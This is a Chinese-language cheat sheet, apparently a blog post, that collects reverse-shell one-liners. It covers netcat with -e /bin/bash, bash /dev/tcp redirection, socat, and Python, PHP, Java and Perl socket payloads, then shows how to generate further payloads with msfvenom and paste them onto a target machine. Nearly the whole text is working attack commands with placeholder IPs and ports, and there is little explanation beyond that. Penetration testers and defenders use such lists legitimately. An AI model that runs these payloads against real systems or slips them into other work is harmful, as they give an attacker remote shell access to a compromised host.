反彈shell命令總結(jié)

1.nc反彈

開啟本地8080端口監(jiān)聽，并將本地的bash發(fā)布出去。
root# nc -lvvp 8080 -t -e /bin/bash

連接目標(biāo)主機
nc ip 端口

2.bash直接反彈

kali監(jiān)聽

靶機運行：
root# bash -i >& /dev/tcp/ip/端口 0>&1

bash命令解析：

反彈成功

3. socat反彈

kali監(jiān)聽：socat tcp-listen:1234 -

靶機運行：
socat exec:‘bash -li’,pty,stderr,setsid,sigint,sane tcp:IP:1234

反彈成功

4.腳本反彈

4.1：python反彈

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);

s.connect(("IP",Port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 

4.2：php反彈

php -r '$sock=fsockopen("IP",PORT);exec("/bin/sh -i <&3 >&3 2>&3");' 

4.3：java反彈

r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/IP/port;cat <&5 |

while read line; do $line 2>&5 >&5; done"] as String[]) p.waitFor() 

4.4：perl反彈

perl -e 'use Socket;$i="IP";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));

if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 

.msf獲取反彈一句話

可以直接使用 msfvenom -l 結(jié)合關(guān)鍵字過濾（如cmd/unix/reverse），找出需要的各類反彈一句話payload的路徑信息。

# msfvenom -l payloads 'cmd/unix/reverse' 

發(fā)現(xiàn)msf支持反彈shell類型豐富。可以根據(jù)需求選擇。

例如：生成bash的

# root@kali:~# msfvenom -p cmd/unix/reverse_bash lhost=1.1.1.1 lport=6666 R 

將生成的payload粘貼，在靶機運行即可。

生成netcat

msfvenom -p cmd/unix/reverse_netcat lhost=1.1.1.1 lport=12345 R 

將生成的payload粘貼，在靶機運行即可。

靶機運行payload:

成功反彈